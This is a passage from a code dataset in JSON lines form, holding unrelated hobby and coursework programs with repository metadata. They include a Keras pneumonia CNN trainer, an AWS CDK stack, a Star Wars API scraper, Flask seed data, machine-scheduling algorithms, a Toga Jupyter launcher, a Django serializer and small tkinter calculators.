directory=input_path+'train', \n target_size=(img_width, img_height), \n batch_size=batch_size, \n class_mode='binary', \n shuffle=True\n )\n\n # I will be making predictions off of the test set in one batch size\n # This is useful to be able to get the confusion matrix\n test_data: List[np.ndarray] = []\n test_labels: List[int] = []\n\n for cond in ('/NORMAL/', '/PNEUMONIA/'):\n for img_fname in (os.listdir(f\"{input_path}test_encoded{cond}\")):\n \"\"\"\n Reads the text files into numpy arrays.\n PNG images are returned as float arrays (0-1). \n All other formats are returned as int arrays, with a bit depth determined by the file's contents.\n \"\"\"\n txt_fname = f\"{input_path}test_encoded{cond}{img_fname}\"\n raw_img_array = read_csv(txt_fname, header=None, sep=\" \").to_numpy()\n greyscale_img_array = cv2.resize(raw_img_array, (img_width, img_height))\n # converts one-channel images into three channel images\n rgb_img_array = cv2.merge([greyscale_img_array]*3)\n rgb_img_array = rgb_img_array.astype('float32')\n label = 0 if cond==\"/NORMAL/\" else 1\n test_data.append(rgb_img_array)\n test_labels.append(label)\n \n test_data = np.array(test_data)\n test_labels = np.array(test_labels)\n \n test_iterator = test_datagen.flow(\n test_data, test_labels, \n batch_size=batch_size, \n shuffle=True\n )\n \n return train_iterator, test_iterator\n\n\n\"\"\"\nMethod for fitting and updating the model\n\"\"\"\ndef fitted_own_model(model: Sequential, lr: float, train_imgs: keras.preprocessing.image.DirectoryIterator, val_imgs: keras.preprocessing.image.NumpyArrayIterator) -> Tuple:\n model.compile(optimizer=Adam(learning_rate=lr), loss='binary_crossentropy', metrics=[\"accuracy\"])\n checkpointer = tf.keras.callbacks.ModelCheckpoint(filepath='weights.best.inc.blond.hdf5', verbose=1, save_best_only=True)\n model_history = model.fit(train_imgs, validation_data=val_imgs, steps_per_epoch=len(train_imgs), validation_steps=len(val_imgs), epochs=10, callbacks=[checkpointer])\n return (model, model_history)\n\n\n\"\"\"\nMethod for updating the learning rate\n\"\"\"\ndef obtain_lr(initial_lr: float, total_epochs: int, round_index: int, epochs_per_round: int) -> float:\n assert total_epochs>=10 and total_epochs%10==0, \"The number of datasets must be divsible by 10!\"\n assert 0<(round_index*epochs_per_round)<=total_epochs\n return initial_lr if round_index*epochs_per_round<=total_epochs/2 else initial_lr/4 if round_index*epochs_per_round<=total_epochs*0.8 else initial_lr/20\n\n\n\"\"\"\ntrains \"create_self_CNN_Model()\" here\nutilizes all the aforementioned methods\n\"\"\"\nif __name__ == \"__main__\":\n # train/test image loading\n train_iterator, test_iterator = process_input_data(input_path=\"../\")\n \n # define the dict to store training history\n training_history: Dict[str, List[float]] = {}\n for his_key in ('loss', 'accuracy', 'val_loss', 'val_accuracy'):\n training_history[his_key] = [] \n acc_per_100_epochs: List[float] = []\n\n # define the customized CNN model\n own_model = create_self_CNN_Model(image_size=Image_Size)\n own_model.build((Batch_Size, Image_Width, Image_Height, Image_Channels))\n own_model.summary()\n\n # proper training\n # 100 epochs for each augmented dataset, maximally 500 epochs, stop training when the average validation accuracy of last 10 epochs becomes above 0.9\n stop_training: bool = False\n rounds_per_dataset: int = 10\n for dataset_count in range(1, 6):\n if stop_training: break\n for round_count in range(1, rounds_per_dataset+1):\n lr = obtain_lr(2e-3, 100, round_count, 10)\n print(f'Learning rate for this round is: {str(lr)}')\n own_model, history = fitted_own_model(own_model, lr, train_iterator, test_iterator)\n for his_key in history.history.keys():\n training_history[his_key].extend(history.history[his_key])\n sliding_avg_10_acc: float = mean(training_history['val_accuracy'][-10:])\n if sliding_avg_10_acc > 0.9 and training_history['val_accuracy'][-1] > 0.9:\n save_model(own_model, Model_Path)\n stop_training = True \n break\n\n acc = own_model.evaluate(test_iterator, verbose=0)[1]\n print(f\"Updated accuracy after using {str(dataset_count)} augmented training datasets: {round(acc, 4)*100}\")\n save_model(own_model, Model_Path)\n \n # save training history into a .json file at disk storage\n with open(History_Path, \"w\") as f:\n f.write(json.dumps(training_history))\n\n # reload the training history from a .json file\n training_history, own_model = None, None\n K.set_learning_phase(0)\n own_model = load_model(Model_Path, custom_objects={\n 'MyConv2D': MyConv2D,\n 'MyMaxPool2D': MyMaxPool2D,\n 'MyDense': MyDense\n })\n acc = own_model.evaluate(test_iterator, verbose=0)[1]*100\n with open(History_Path, \"r\") as f:\n training_history = json.loads(f.read())\n print(f\"Number of trained epochs until we obtained an accuracy at {round(acc, 2)}: {len(training_history['val_accuracy'])}\")\n","repo_name":"Orthologues/DM873-DeepLearning","sub_path":"pneunomiaXray_toyProject_acc92/py_code/training_main.py","file_name":"training_main.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"22439987414","text":"from constructs import Construct\nfrom aws_cdk import (\n aws_cloudfront_origins,\n Stack,\n aws_iam as iam,\n aws_s3 as s3,\n aws_cloudfront as cf\n)\n\n\nclass CupcakeCdkStack(Stack):\n\n def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:\n super().__init__(scope, construct_id, **kwargs)\n\n bucket = s3.Bucket(\n self, \n \"cupcake_cms\",\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL\n )\n \n oai = cf.OriginAccessIdentity(self, \"OAI\", comment=\"Connects CF with S3\")\n bucket.grant_read(oai)\n \n distribution = cf.Distribution(\n self,\n \"CDN\",\n minimum_protocol_version=cf.SecurityPolicyProtocol.TLS_V1_2_2018,\n default_behavior=cf.BehaviorOptions(\n allowed_methods=cf.AllowedMethods.ALLOW_ALL,\n origin=aws_cloudfront_origins.S3Origin(\n bucket=bucket,\n origin_access_identity=oai,\n origin_path=\"/\",\n ),\n viewer_protocol_policy=cf.ViewerProtocolPolicy.REDIRECT_TO_HTTPS,\n )\n )\n","repo_name":"ShiedaKayn1975/cupcake-cdk","sub_path":"cupcake_cdk/cupcake_cdk_stack.py","file_name":"cupcake_cdk_stack.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5259632612","text":"import json\nimport requests\n\n\ndef get_resource_page(resource, page):\n \"\"\" Get a single page from the resource. \"\"\"\n # Requests the API data for a specific resource and page number.\n response = requests.get(f\"https://swapi.dev/api/{resource}/?page={page}\")\n # If the status code is 200, meaning the request was successful, return the JSON data.\n if response.status_code == 200:\n return response.json()\n\n\ndef API_scrape(resource, property=None):\n \"\"\" Call the SWAPI and create a list of data. \"\"\"\n data_list = []\n page = 1\n while True:\n # Calls the function get_resource_page to get data\n data = get_resource_page(resource, page)\n if data is None:\n break\n else:\n # Appends the results to data_list\n filtered_data = data[\"results\"]\n for item in filtered_data:\n # If a property is specified, appends only the property value of each item, else appends the whole item.\n data_list.append(item if not property else item[f'{property}'])\n # Increments the page number\n page += 1\n\n print(f'Successfully fetched {len(data_list)} {resource}.')\n return data_list\n\n\ndef main():\n database = {}\n # Calls API_scrape for each Star Wars category and adds them to database dictionary\n database['starships'] = API_scrape('starships', 'model')\n database['planets'] = API_scrape('planets', 'name')\n database['species'] = API_scrape('species', 'name')\n database['characters'] = API_scrape('people')\n\n file = 'sw_database.json'\n with open(file, 'w') as f:\n # Dumps the database dictionary into a JSON file\n json.dump(database, f)\n\n print('Database saved successfully.')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"alinikan/star-wars-character-generator","sub_path":"api_scrape.py","file_name":"api_scrape.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25931427119","text":"from app.models import db, Interview, environment, SCHEMA\nfrom sqlalchemy.sql import text\nfrom datetime import datetime\n\n\ndef seed_interviews():\n\n test_date_str = '2023-12-10'\n test_date = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str1 = '2023-11-10'\n test_date1 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n test_date_str2 = '2023-12-02'\n test_date2 = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str3 = '2023-12-15'\n test_date3 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n test_date_str4 = '2023-12-20'\n test_date4 = datetime.strptime(test_date_str, \"%Y-%m-%d\").date()\n test_date_str5 = '2023-11-22'\n test_date5 = datetime.strptime(test_date_str1, \"%Y-%m-%d\").date()\n \n\n interview1 = Interview(\n userId=1,\n position='Software Engineer',\n company=\"Amazon\",\n location='New York',\n status='Pending',\n type='Onsite',\n date=test_date\n\n )\n interview2 = Interview(\n userId=1,\n position='Front-end Engineer',\n company=\"Chase\",\n location='New York',\n status='Scheduled',\n type='Onsite',\n date=test_date1\n\n )\n interview3 = Interview(\n userId=2,\n position='Senior Engineer',\n company=\"Bank of America\",\n location='New York',\n status='Pending',\n type='Remote',\n date=test_date2\n\n )\n interview4 = Interview(\n userId=2,\n position='Cloud Engineer',\n company=\"Walmart\",\n location='New York',\n status='Scheduled',\n type='Onsite',\n date=test_date3\n\n )\n interview5 = Interview(\n userId=3,\n position='Cloud Engineer',\n company=\"Netflix\",\n location='New York',\n status='Scheduled',\n type='Remote',\n date=test_date4\n\n )\n interview6 = Interview(\n userId=3,\n position='Cloud Engineer',\n company=\"Facebook\",\n location='New York',\n status='Scheduled',\n type='Remote',\n date=test_date5\n\n )\n db.session.add(interview1)\n db.session.add(interview2)\n db.session.add(interview3)\n db.session.add(interview4)\n db.session.add(interview5)\n db.session.add(interview6)\n db.session.commit()\n\ndef undo_interviews():\n if environment == 'production':\n db.session.execute(f\"TRUNCATE table {SCHEMA}.interviews RESTART IDENTITY CASCADE;\")\n else:\n db.session.execute(text('DELETE FROM interviews'))\n db.session.commit()\n\n","repo_name":"ahmad-shaukat/JobSphere","sub_path":"app/seeds/interviews.py","file_name":"interviews.py","file_ext":"py","file_size_in_byte":2550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70247249850","text":"env = Environment()\n\nenv.Append(CCFLAGS = ['-Werror', '-Wall','-Wextra','-ansi','-pedantic'])\n\nenv.Append(CCFLAGS = ['-DNDEBUG'])\n\nfractions_source_files = Split(\"\"\"\n\tmain_fractions.c\n\tfractions.c\n\t\"\"\")\n\ntablen_source_files = Split(\"\"\"\n\tmain_tablen.c\n\ttablen.c\n\t\"\"\")\n\npropercase_source_files = Split(\"\"\"\n\tmain_propercase.c\n\tpropercase.c\n\t\"\"\")\n\nstripcomments_source_files = Split(\"\"\"\n\tmain_stripcomments.c\n\tstripcomments.c\n\t\"\"\")\n\ndecoder_source_files = Split(\"\"\"\n\tmain_decoder.c\n\tdecoder.c\n\t\"\"\")\n\nlibraries = ['m']\n\nfractions = env.Program(target=\"fractions\", source=fractions_source_files)\ntablen = env.Program(target=\"tablen\", source=tablen_source_files)\npropercase = env.Program(target=\"propercase\", source=propercase_source_files)\nstripcomments = env.Program(target=\"stripcomments\", source=stripcomments_source_files)\ndecoder = env.Program(target=\"decoder\", source=decoder_source_files)\n\nDefault(fractions)\n\n","repo_name":"beentaken/mmeng-personal-work","sub_path":"cs120/lab/10/SConstruct","file_name":"SConstruct","file_ext":"","file_size_in_byte":911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30918948119","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nimport random\nimport copy\nimport matplotlib.pyplot as plt\nimport timeit\nimport evaluation\nfrom johnson import johnson\nfrom arbre import arbre\nfrom instances import *\n\ndef john_(k, n, m=3, debug=False, d=None, **kwargs):\n \"\"\"\n Fonction interface avec la méthode approchée de Johnson.\n Récupère un type d'instance et effectue l'ordonnancement\n sur une instance de ce type (n=#taches, m=#machines).\n Il est aussi possible d'envoyer directement un jeu de donnée.\n \"\"\"\n\n if d == None: d = instances_dict[k][0](n, m)\n if debug: print(d)\n sol, time = johnson(d)\n return sol, time\n\ndef arbre_(k, n, m=3, debug=False, d=None, **kwargs):\n \"\"\"\n Fonction interface avec la méthode exacte.\n Récupère un type d'instance et effectue l'ordonnancement\n sur une instance de ce type (n=#taches, m=#machines).\n Il est aussi possible d'envoyer directement un jeu de donnée.\n Possibilité d'envoyer en argument un alpha pour avoir\n une solution approchée avec garantie de qualité (a-approchée)\n par cette méthode.\n \"\"\"\n\n if d == None: d = instances_dict[k][0](n, m)\n if debug: print(d)\n pi, piprime = [], np.array(range(np.size(d, 0)))\n depth, sol = 0, None\n sol, time = arbre(d, pi, piprime, depth, sol, debug, kwargs.get('alpha',0))\n return sol, time\n\ndef test(a=0):\n \"\"\"\n Vérifie si la méthode exacte renvoie bien des durées\n inférieures à celles de la méthode approchée de Johnson.\n a : solution approchée avec garantie de qualité (a-approchée)\n par la méthode arborescente.\n \"\"\"\n\n ass = []\n debug = False\n n, m = 6, 3\n for k in range(200):\n k = np.random.randint(len(instances_dict))\n d = instances_dict[k][0](n, m)\n sol1, time1 = john_(k, n, m, debug, d)\n sol2, time2 = arbre_(k, n, m, debug, d, alpha=a)\n ass.append(int(time1 >= time2))\n print(sum(ass)/len(ass)*100,\"%\")\n\ndef main(algo, max_n, alpha=0):\n \"\"\"\n Trace les courbes du temps d'éxecution d'une méthode pour chaque type\n d'instance en fonction du nombre de tâche.\n algo : Nom de la méthode et de sa fonction.\n max_n : Nombre maximum de tâches d'un jeu de donnée.\n alpha : Utile pour rendre approchée la méthode arborescente. (Voir fonction)\n \"\"\"\n\n print(algo)\n s = \"from __main__ import {}\".format(algo)\n tailles = range(1, max_n)\n exectime = [[timeit.timeit('{}({}, {}, alpha={})'.format(algo, k, n, alpha), number=100, setup=s) for n in tailles] for k in range(len(instances_dict))]\n fig = plt.figure()\n ax = plt.subplot(111)\n for i, c in enumerate(exectime):\n ax.plot(tailles, c, label='{}'.format(instances_dict[i][1]))\n ax.legend()\n plt.ylabel('{}exec_time'.format(algo))\n plt.xlabel('nb_taches')\n\nif __name__ == \"__main__\":\n # Elagage des noeuds dont leur score est 10%\n # inférieur au score de la solution courante\n a = 0.4\n # test(a)\n max_taches = 5\n #main(john_.__name__, max_taches)\n main(arbre_.__name__, max_taches, alpha=0)\n plt.show()\n","repo_name":"nestarz/machine-scheduling","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7582657430","text":"import asyncio\nimport subprocess\nimport toga\nfrom toga.style.pack import Pack, ROW, CENTER, COLUMN\nimport time\nimport sys\nimport os\nfrom pathlib import Path\nfrom urllib.parse import quote\n\ndef install_dependencies(*args, **kwargs):\n print(\"Command called\")\n import subprocess\n subprocess.call(\"pip install numpy\", shell=True)\n print(\"Success\")\n # stdout, stderr = await proc.communicate()\n\n # print(f'[{cmd!r} exited with {proc.returncode}]')\n # if stdout:\n # print(f'[stdout]\\n{stdout.decode()}')\n # if stderr:\n # print(f'[stderr]\\n{stderr.decode()}')\n\nclass Notebook(toga.Document):\n def __init__(self, filename, app):\n super().__init__(filename=filename, document_type='Jupyter Notebook', app=app)\n\n self.window = toga.Window(title=filename, size=(768,768))\n self.window.on_close = self.close_window\n self.webview = toga.WebView(style=Pack(flex=1))\n self.window.content = self.webview\n\n def close_window(self):\n self.proc.kill()\n\n def read(self):\n asyncio.ensure_future(self.start_jupyter(self.filename))\n\n def show(self):\n self.window.show()\n\n async def start_jupyter(self, filename):\n filename = Path(filename)\n command = '{} -m notebook --NotebookApp.token=\"\" --NotebookApp.open_browser=False --notebook-dir=\"{}\"'.format(sys.executable, filename.parent)\n self.proc = await asyncio.create_subprocess_shell(\n command,\n stdin=None,\n stdout=asyncio.subprocess.PIPE, stderr=asyncio.subprocess.PIPE,\n )\n line = await self.proc.stderr.readline()\n while line:\n line = line.strip().decode('utf-8')\n if 'http' in line:\n url = line.split(' ')[-1]\n url = \"{}notebooks/{}\".format(url, quote(filename.name))\n self.webview.url = url\n line = await self.proc.stderr.readline()\n\n\nclass Hera(toga.DocumentApp):\n\n def __init__(self):\n resource_dir = os.path.dirname(os.path.dirname(os.path.dirname(__file__)))\n super().__init__(\n 'Hera',\n document_types={'ipynb': Notebook},\n )\n os.environ['PIP_TARGET'] = str(self.paths.data / 'pkgs')\n sys.path.append(str(self.paths.data / 'pkgs'))\n os.environ['PYTHONPATH'] += ':' + str(self.paths.data / 'pkgs')\n print(os.environ['PYTHONPATH'])\n\n cmd1 = toga.Command(\n install_dependencies,\n label='Install packages',\n tooltip='Installs some helpful packages',\n shortcut=toga.Key.MOD_1 + 'i',\n icon='icons/pretty.png',\n group=toga.Group.FILE,\n section=0\n )\n\n self.commands.add(cmd1)\n\n def startup(self):\n pass\n\ndef main():\n Hera().main_loop()\n\n\nif __name__ == '__main__':\n main()","repo_name":"phildini/hera","sub_path":"hera/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2852,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"77"} +{"seq_id":"15004480453","text":"from rest_framework import serializers\nfrom cars.models import Car\nfrom saves.models import Save\nfrom biddings.models import Bidding\n\n\nclass CarSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n is_owner = serializers.SerializerMethodField()\n profile_id = serializers.ReadOnlyField(source='owner.profile.id')\n profile_image = serializers.ReadOnlyField(source='owner.profile.image.url')\n save_id = serializers.SerializerMethodField()\n bidding_id = serializers.SerializerMethodField()\n saves_count = serializers.ReadOnlyField()\n biddings_count = serializers.ReadOnlyField()\n comments_count = serializers.ReadOnlyField()\n\n def validate_image(self, value):\n if value.size > 2 * 1024 * 1024:\n raise serializers.ValidationError('Image size larger than 2MB!')\n if value.image.height > 4096:\n raise serializers.ValidationError(\n 'Image height larger than 4096px!'\n )\n if value.image.width > 4096:\n raise serializers.ValidationError(\n 'Image width larger than 4096px!'\n )\n return value\n\n def get_is_owner(self, obj):\n request = self.context['request']\n return request.user == obj.owner\n\n def get_save_id(self, obj):\n user = self.context['request'].user\n if user.is_authenticated:\n save = Save.objects.filter(\n owner=user, car=obj\n ).first()\n return save.id if save else None\n return None\n\n def get_bidding_id(self, obj):\n user = self.context['request'].user\n if user.is_authenticated:\n bidding = Bidding.objects.filter(\n owner=user, car=obj\n ).first()\n return bidding.id if bidding else None\n return None\n\n class Meta:\n model = Car\n fields = [\n 'id', 'owner', 'is_owner', 'profile_id',\n 'profile_image', 'created_at', 'updated_at',\n 'title', 'content', 'year', 'km', 'price', 'image',\n 'image2', 'image3', 'image4', 'image_filter',\n 'save_id', 'bidding_id', 'saves_count', 'biddings_count',\n 'comments_count'\n ]\n","repo_name":"MustafaSahinci/pp5-backend","sub_path":"cars/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34784712199","text":"def merge(list1, list2):\n i = 0\n j = 0\n ans = []\n while i < len(list1) and j < len(list2):\n if list1[i] < list2[j]:\n ans.append(list1[i])\n i += 1\n else:\n ans.append(list2[j])\n j += 1\n while j < len(list2):\n ans.append(list2[j])\n j += 1\n while i < len(list1):\n ans.append(list1[i])\n i += 1\n return ans\n\n\ndef mergesort(lst):\n if len(lst) == 1:\n return lst\n return merge(mergesort(lst[:len(lst) // 2]), mergesort(lst[len(lst) // 2:]))\n\nprint(mergesort([10,1,2,3,13]))\n","repo_name":"awemipt/pythonBasic","sub_path":"lesson7/lesson7.7/step8.py","file_name":"step8.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5249870530","text":"# Задайте последовательность чисел. Напишите программу, которая\n# выведет список неповторяющихся элементов исходной последовательности.\n\nfrom random import randint as rnd\n\n\ndef fill_array(arr):\n for i in range(len(arr)):\n arr[i] = rnd(0, len(arr))\n print('Cписок всех элементов: ', '\\n', arr)\n\n\ndef order(arr):\n num = []\n for i in range(len(arr)):\n if arr.count(arr[i]) == 1:\n num.append(arr[i])\n print('Cписок неповторяющихся элементов: ', '\\n', num)\n\n\nn = int(input('Введите размер последовательности: '))\nnumbers = ['']*n\nfill_array(numbers)\nprint('Cписок однократно повторяющихся элементов: ', '\\n', list(set(numbers)))\norder(numbers)\n","repo_name":"EvgenyVarlamov/Py_HomeWorkFolder_004","sub_path":"Hometask003.py","file_name":"Hometask003.py","file_ext":"py","file_size_in_byte":913,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23090128138","text":"#!/usr/bin/env python3\n\ntop = '..'\n\nimport sys\n\ndef build(bld):\n def w32_flags(bld, target):\n return ''\n if bld.env.PLATFORM == 'win32':\n return '-Wl,--out-implib,{0}.a'.format(target)\n else:\n return ''\n\n plugins = ['Reverser', 'Tapestop', 'Crush', 'Repeat']\n formats = [('ladspa', 'bitrot_{0}'), ('vst', 'bitrot_{0}_vst')]\n bundle = 'bitrot.lv2'\n\n import os.path\n import inspect\n ttlgen = os.path.dirname(os.path.abspath(inspect.stack()[0][1]))\n ttlgen = os.path.join(ttlgen, 'ttlgen.py')\n\n ttls = []\n tasks = {}\n\n for plugin_name in plugins:\n source = '{0}/Bitrot{0}.cpp'.format(plugin_name)\n plugin = plugin_name.lower()\n\n for format, target in formats:\n target = target.format(plugin)\n\n # bloody windows tho\n w32 = w32_flags(bld, target)\n\n t = bld.shlib(features = 'cxx cxxshlib',\n source = [source],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_{0}'.format(format.upper())],\n name = '{0} ({1})'.format(plugin_name, format.upper()),\n target = target,\n install_path = '${{PREFIX}}/lib/{0}'.format(format))\n tasks[t.name] = t\n\n target = '{0}/{1}'.format(bundle, plugin)\n w32 = w32_flags(bld, plugin)\n\n lv2 = bld.shlib(features = 'cxx cxxshlib',\n source = [source],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_LV2'],\n name = '{0} (LV2)'.format(plugin_name),\n target = target,\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle))\n\n extension = bld.env.cxxshlib_PATTERN\n extension = extension[(extension.rfind('.') + 1):]\n metasrc = bld(features = 'cxx cxxprogram',\n source = [source,\n '../common/MetadataGenerator.cpp'],\n includes = ['../DPF/distrho', plugin_name, '../common'],\n cxxflags = ['-DDISTRHO_PLUGIN_TARGET_LV2',\n '-DBITROT_BINARY_NAME=\"{0}.{1}\"'.format(\n plugin,\n extension,\n ),\n '-DBITROT_TTL_NAME=\"{0}.ttl\"'.format(\n plugin,\n ),\n '-Dprotected=public'], # ...pretend you didn't see that\n ldflags = [],\n name = '{0} (LV2 metadata generator)'.format(plugin),\n target = 'metagen/{0}'.format(plugin),\n install_path = None)\n\n # Restore the original environment for the metadata generator\n for k in metasrc.env.keys():\n del metasrc.env[k]\n metasrc.env.load('.default_env')\n\n ttl = bld(features = 'seq',\n rule = '\"{0}\" \"{1}\" ${{SRC}}'.format(sys.executable, ttlgen),\n source = 'metagen/{0}'.format(metasrc.env.cxxprogram_PATTERN % plugin),\n target = ['{0}/{1}.ttl'.format(bundle, plugin),\n '{0}/manifest.{1}.ttl'.format(bundle, plugin)],\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle),\n name = '{0}.ttl'.format(plugin),\n use = metasrc.get_name(),\n cwd = os.path.join(bld.out_dir, 'plugins', bundle))\n ttls.append(ttl)\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/manifest.ttl'.format(bundle)),\n bld.path.find_or_declare('{0}/manifest.{1}.ttl'.format(bundle, plugin)),\n )\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/{1}.ttl'.format(bundle, plugin)),\n bld.path.find_or_declare(ttlgen),\n )\n\n bld.add_manual_dependency(\n bld.path.find_or_declare('{0}/manifest.ttl'.format(bundle, plugin)),\n bld.path.find_or_declare(ttlgen),\n )\n\n manifest = bld(features = 'seq',\n rule = '\"{0}\" \"{1}\"'.format(sys.executable, ttlgen),\n target = '{0}/manifest.ttl'.format(bundle),\n source = ['{0}/manifest.{1}.ttl'.format(bundle, x.lower()) for x in plugins],\n install_path = '${{PREFIX}}/lib/lv2/{0}'.format(bundle),\n name = 'manifest.ttl',\n use = ttl,\n cwd = os.path.join(bld.out_dir, 'plugins', bundle))\n\n if bld.env.PLATFORM == 'darwin':\n for plugin_name in plugins:\n name = '{0} (VST)'.format(plugin_name)\n vst = tasks[name]\n\n vst_bundle = 'Bitrot {0}.vst'.format(plugin_name)\n vst_bundle = bld.path.get_bld().make_node(vst_bundle)\n vst_bundle.mkdir()\n\n contents = vst_bundle.make_node('Contents')\n contents.mkdir()\n\n macos = contents.make_node('MacOS')\n macos.mkdir()\n\n resources = contents.make_node('Resources')\n resources.mkdir()\n\n pkginfo = contents.make_node('PkgInfo')\n pkginfo.write('BNDL????\\n')\n\n dylib = bld.env.cxxshlib_PATTERN % vst.target\n bld(features = 'seq',\n rule = 'cp ${SRC} ${TGT}',\n source = dylib,\n target = macos.make_node(dylib),\n shell = False,\n use = vst)\n\n info_plist = contents.make_node('Info.plist')\n info_plist.write(info_plist_template.format(\n dylib=dylib,\n name=plugin_name,\n version=bld.env.VERSION[0],\n ))\n\ninfo_plist_template = '''\\\n\n\n\n\n \n CFBundleExecutable\n {dylib}\n CFBundleInfoDictionaryVersion\n 6.0\n CFBundleName\n Bitrot {name} VST\n CFBundleIdentifier\n io.github.grejppi.bitrot.{name}\n CFBundlePackageType\n BNDL\n CFBundleVersion\n {version}\n CSResourcesFileMapped\n \n CFBundleSignature\n ????\n \n\n'''\n","repo_name":"grejppi/bitrot","sub_path":"plugins/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":6961,"program_lang":"python","lang":"en","doc_type":"code","stars":39,"dataset":"github-code","pt":"77"} +{"seq_id":"14492099968","text":"from tkinter import *\n\n\n\n\ndef imcc():\n imc = Tk()\n imc.geometry('800x800')\n imc.rowconfigure(0, weight=1)\n imc.rowconfigure(1, weight=1)\n imc.rowconfigure(2, weight=1)\n imc.rowconfigure(3, weight=1)\n imc.rowconfigure(4, weight=1)\n \n \n \n imc.columnconfigure(0,weight=1)\n imc.columnconfigure(1,weight=1)\n imc.columnconfigure(2,weight=1)\n\n\n def imC():\n\n res['text'] = x = float( p.get() )/ ( float(alt.get())* float(alt.get()))\n \n if x > 18.5 and x < 25:\n saud['text'] = 'Saudavel'\n else:\n pass\n\n if x > 25:\n saud['text'] = 'Sobre peso'\n else:\n pass\n\n\n if x < 18.5:\n saud['text'] = 'Magro'\n\n\n\n\n #========================BACK END================================\n #=========================FRONT END=================================\n peso = Label(imc ,text ='Peso:',foreground = 'black',font= 'Arial 25')\n peso.grid(column =0,row = 0,sticky=NSEW)\n\n p = Entry(imc,font='40')\n p.grid(row = 0,column = 1,sticky=NSEW)\n\n\n altura= Label(imc ,text ='Altura:',foreground = 'black',font= 'Arial 25')\n altura.grid(column =0,row = 1,sticky=NSEW)\n\n alt = Entry(imc,font='40')\n alt.grid(row = 1,column = 1,sticky=NSEW)\n\n botao = Button(imc,text='IMC',foreground='black',command=imC)\n botao.grid(row=2,column=1,sticky=NSEW)\n\n\n res = Label(imc,text='resultado',font='Arial 25' )\n res.grid(row= 3,column=1,sticky=NSEW)\n\n saud = Label(imc,text='você esta...',font='Arial 25' )\n saud.grid(row= 4,column=1,sticky=NSEW)\n\n\n\n\n imc.mainloop()\n\n\n\n\n\n#======================= FAHRENHEIT ==================================\n\ndef fahren():\n grau = Tk()\n grau.geometry('400x400')\n grau.columnconfigure(0, weight=1)\n grau.columnconfigure(1, weight=1)\n\n\n grau.rowconfigure(0,weight=1)\n grau.rowconfigure(1,weight=1)\n\n\n\n def fah():\n resu['text'] = (float(entrada.get()) * 1.8) + 32\n\n\n\n # F = C*1.8 + 32\n #+===============Back end======\n #==========================================\n #=================FRONT END\n celsio = Label(grau,text='C°:',font='Arial 25')\n celsio.grid(row=0,column=0)\n\n\n entrada = Entry(grau,font='40')\n entrada.grid(row=0,column=1)\n\n botao = Button(grau,text = 'Converter °F',font='40',command=fah)\n botao.grid(row=1,column=0)\n\n\n resu= Label(grau,text='0',font='40')\n resu.grid(row=1,column=1)\n\n\n\n grau.mainloop()\n\n\n\n#===========================PAGINA PRINCIPAL=========================#\n\nal3 = Tk()\nal3.geometry('800x800')\nal3.columnconfigure(0, weight=1)\nal3.columnconfigure(1, weight=1)\nal3.columnconfigure(2, weight=1)\n\nal3.rowconfigure(1,weight=1)\nal3.rowconfigure(2,weight=1)\n\n\n\n\ntext = Label(al3,text='ESCOLHA A FUNÇÃO',font='200')\ntext.grid(row=1,column=1,sticky=NSEW)\n\n\ncont = Label(al3,text='',font='40')\ncont.grid(row=1,column=0,sticky=NSEW)\n\n\nbtn1 = Button(al3,text='IMC',font='Arial 12', bg='#240A09',fg='white',command=imcc)\nbtn1.grid(row=2,column=0,sticky=NSEW)\n\n\nbtn2 = Button(al3,text='F°',font='Arial 12',bg='#240A09',fg='white',command=fahren)\nbtn2.grid(row=2,column=2,sticky=NSEW)\n\n\n\n#===========================================================================\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nal3.mainloop()","repo_name":"JWsley/Aulas-Tkinter","sub_path":"AULA-3/aula 3_tkinter.py","file_name":"aula 3_tkinter.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74061901049","text":"\"\"\"\n1. find the minNum (finished)\n2. start serach and add number to string (working)\n3. stop\n\"\"\"\n_map = []\nr, c = map(int, input('').split(' '))\nfor i in range(r):\n \n temp = []\n temp = 